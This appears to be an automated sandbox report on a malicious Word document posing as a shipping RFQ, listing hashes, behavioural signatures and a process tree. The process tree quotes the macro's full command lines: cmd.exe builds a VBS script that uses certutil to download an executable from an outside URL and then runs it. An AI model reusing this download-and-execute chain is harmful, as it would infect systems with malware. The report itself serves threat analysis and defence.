Analysis
  Max time kernel: 150s
  Max time network: 154s
  Platform: windows10-2004_x64
  Resource: win10v2004-20220812-en
  Resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  Submitted: 12-10-2022 07:55
Behavioral tasks
  behavioral1: Sample "RFQ-MVP300-3400 For MSA New Vessel.doc", Resource win7-20220901-en
  behavioral2: Sample "RFQ-MVP300-3400 For MSA New Vessel.doc", Resource win10v2004-20220812-en
General
  Target: RFQ-MVP300-3400 For MSA New Vessel.doc
  Size: 63KB
  MD5: 5d3e6d263bd94b901830e792fd237693
  SHA1: de135c0e1255f334513aff51515de780d8ac8099
  SHA256: 7ce5a9235acf3eb2001197190b598be8fa49e8f0e2ef9d0ae0a1c2c3095cd7b7
  SHA512: 3b1a29ef85680507f70f374fa5ec72cc56387b258d4a39ee64dc3ac980170116a0ddff972813a40a247a28f761aa129fea20d69753c543fade5f30c4991a6355
  SSDEEP: 384:OiCquMo5W4eDbg8iSUR/8daGJrqrjKOxtXYI+Q/cj0tpbnopkpSEP0j:OiCXf5zSe/qvsuxI+4DpbnokSi
Malware Config
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description | pid | pid_target | process | target process):
    Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3756 | 3968 | cmd.exe | WINWORD.EXE
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description | ioc | process):
    Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | cmd.exe
    Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | WScript.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description | ioc | process):
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
- Delays execution with timeout.exe (2 IoCs)
  Processes (pid | process):
    4880 | timeout.exe
    4116 | timeout.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Modifies registry class (1 IoC)
  Processes (description | ioc | process):
    Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings | cmd.exe
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes (pid | process):
    3968 | WINWORD.EXE (2 occurrences)
- Suspicious use of SetWindowsHookEx (7 IoCs)
  Processes (pid | process):
    3968 | WINWORD.EXE (7 occurrences)
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes (description | pid | process | target process):
    PID 3968 wrote to memory of 3756 | 3968 | WINWORD.EXE | cmd.exe (2 occurrences)
    PID 3756 wrote to memory of 4880 | 3756 | cmd.exe | timeout.exe (2 occurrences)
    PID 3756 wrote to memory of 772 | 3756 | cmd.exe | WScript.exe (2 occurrences)
    PID 3756 wrote to memory of 4116 | 3756 | cmd.exe | timeout.exe (2 occurrences)
    PID 772 wrote to memory of 3572 | 772 | WScript.exe | cmd.exe (2 occurrences)
    PID 3572 wrote to memory of 4120 | 3572 | cmd.exe | certutil.exe (2 occurrences)
Processes (process tree; the bracketed number is the depth in the tree)
  [1] C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ-MVP300-3400 For MSA New Vessel.doc" /o ""
      - Checks processor information in registry
      - Enumerates system info in registry
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
    [2] C:\Windows\SYSTEM32\cmd.exe
        Command line: cmd.exe /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "http://tulpexim.com/html/dixtin.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && echo CreateObject("WScript.Shell").Run "cmd.exe /c %temp%\bin.exe", 0, True >> %temp%\script.vbs && timeout 3 && start %temp%\script.vbs && timeout 3 && del %temp%\script.vbs
        - Process spawned unexpected child process
        - Checks computer location settings
        - Modifies registry class
        - Suspicious use of WriteProcessMemory
      [3] C:\Windows\system32\timeout.exe
          Command line: timeout 3
          - Delays execution with timeout.exe
      [3] C:\Windows\System32\WScript.exe
          Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs"
          - Checks computer location settings
          - Suspicious use of WriteProcessMemory
        [4] C:\Windows\System32\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /c certutil.exe -urlcache -split -f http://tulpexim.com/html/dixtin.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
            - Suspicious use of WriteProcessMemory
          [5] C:\Windows\system32\certutil.exe
              Command line: certutil.exe -urlcache -split -f http://tulpexim.com/html/dixtin.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
      [3] C:\Windows\system32\timeout.exe
          Command line: timeout 3
          - Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
  C:\Users\Admin\AppData\Local\Temp\script.vbs
    Filesize: 289B
    MD5: 662449f1879133e0fc1f2385f79debfc
    SHA1: 47895b9fb941a4cf85224ead44e3dedb6b4ab6a0
    SHA256: 749c75087d71b5be5b97333ac2a47bf758e4c2a6fc393c40bde00a73cea4fd98
    SHA512: d200dfb1e4900524d6663f5fc81f08decc5d8c57c57a6dd852e5ea4a59632c9ebec7ff59f275c4acd79130baaab799a5833394867f8acf9d75cf4ffa536e3c83
  Memory dumps (file | filesize):
    memory/772-141-0x0000000000000000-mapping.dmp
    memory/3572-144-0x0000000000000000-mapping.dmp
    memory/3756-139-0x0000000000000000-mapping.dmp
    memory/3968-135-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmp | 64KB
    memory/3968-137-0x00007FF832E40000-0x00007FF832E50000-memory.dmp | 64KB
    memory/3968-138-0x00007FF832E40000-0x00007FF832E50000-memory.dmp | 64KB
    memory/3968-136-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmp | 64KB
    memory/3968-132-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmp | 64KB
    memory/3968-134-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmp | 64KB
    memory/3968-133-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmp | 64KB
    memory/4116-142-0x0000000000000000-mapping.dmp
    memory/4120-145-0x0000000000000000-mapping.dmp
    memory/4880-140-0x0000000000000000-mapping.dmp